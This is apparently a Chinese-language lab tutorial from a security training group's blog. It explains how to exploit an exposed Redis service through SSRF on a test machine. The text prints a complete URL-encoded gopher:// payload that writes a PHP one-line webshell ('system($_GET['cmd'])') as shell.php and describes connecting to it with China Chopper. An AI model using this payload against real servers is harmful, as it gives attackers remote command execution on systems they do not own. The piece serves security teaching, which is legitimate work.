小編這幾天一直在做關於ssrf的實驗,這篇文章可以帶純小白黑客入門。
靶機ip地址:192.168.2.138
查看靶機運行的redis服務。
攻擊機為ip192.168.2.112.
用客戶端redis-cli連接攻擊機。
然後輸入命令。
最後用save來保存。
然後進入靶機的docker的redis看看有沒有test.php.
查看一下test.php的內容。
此時,就可以用菜刀連接了。
那我們換種方式來。
先用kali來查看一下靶機(192.168.2.138)的6379端口的信息
用攻擊機(192.168.1.112)來使用gopher-redis-auth-master來加載負載。
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%245%0D%0A/data%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
把這個複製到我的kali上,然後把127.0.0.1改成目標的ip
進入192.168.2.138靶機的的docker的/data上查看有無寫入
成功寫入。
查看dump.rdb的內容
此時,寫入了一句話木馬,這時候就可以用菜刀連接了。
最後還可以使用kali的nmap -p 6379 –script redis –info 192.168.2.138探測ssrf漏洞。
最後喜歡我文章的朋友請加圈子關注我們,私信關鍵詞:學習。(送免費資料和優惠券)
就會自動分享給你微信號。歡迎大家加入我們的安全大家庭。提高大家的安全意識,提升大家的網絡安全技能一直是我們的初衷和願景,讓我們共同成為守護信息世界的"SaFeMAN"。
還有可以關注我們微信公眾號,在公眾號上輸入安界網,就可以關注到我們,領取資料和優惠券
閱讀更多 安界 的文章